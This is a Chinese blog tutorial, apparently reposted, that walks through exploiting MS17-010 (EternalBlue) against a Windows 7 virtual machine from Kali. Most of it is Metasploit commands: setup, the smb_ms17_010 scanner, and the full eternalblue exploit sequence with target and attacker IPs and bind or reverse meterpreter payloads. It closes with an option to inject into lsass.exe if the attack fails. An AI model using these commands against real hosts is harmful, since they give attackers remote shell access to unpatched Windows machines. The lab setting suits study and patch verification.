MS17-010永恒之蓝验证

一、安装MSF,windows下安装也可以,直接安装kali也可以,我是kali是攻击主机,win7是靶机,都在虚拟机里。

1、windows下安装MSF请参考:http://blog.csdn.net/wangsy0202/article/details/51914748(https://www.metasploit.com/官网下载)

2、kali的安装请直接去官网下载:https://www.kali.org/downloads/

3、漏洞攻击文章请参考:https://bbs.ichunqiu.com/thread-23115-1-1.html

准备时候还是要说一下注意事项:

(1)请安装相关ruby插件:

安装过程是:打开msfconsole 然后输入命令:

1 gem install ruby_smb

(2)一定要搞清楚win7主机防火墙和共享服务配置445需要open 

(3)网络环境要搞清楚,是否有访问策略 是否有域认证等等,想明白了就像谁能发起连接。

#攻击机可以主动发起连接,请使用正向payload windows/x64/meterpreter/bind_tcp

#双向都可以主动发起连接的,请随意。(反向的windows/x64/meterpreter/reverse_tcp)

#双向都不可以的,或者攻击机不可以的那就别玩了。

(4)可以先扫描看看是否有漏洞

1 use auxiliary/scanner/smb/smb_ms17_010
2 set RHOSTS [targetip]
3 run

二、开始攻击:

1 msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue 
2 msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp 
3 msf exploit(ms17_010_eternalblue) > set RHOST 192.168.177.129
4 msf exploit(ms17_010_eternalblue) > set LHOST 192.168.177.135
5 msf exploit(ms17_010_eternalblue) > exploit

 

 搞定收工

如果不行,麻烦加上这句:

1 set PROCESSINJECT   lsass.exe
2 set TARGETARCHITECTURE x64
原文地址:https://www.cnblogs.com/KevinGeorge/p/8082570.html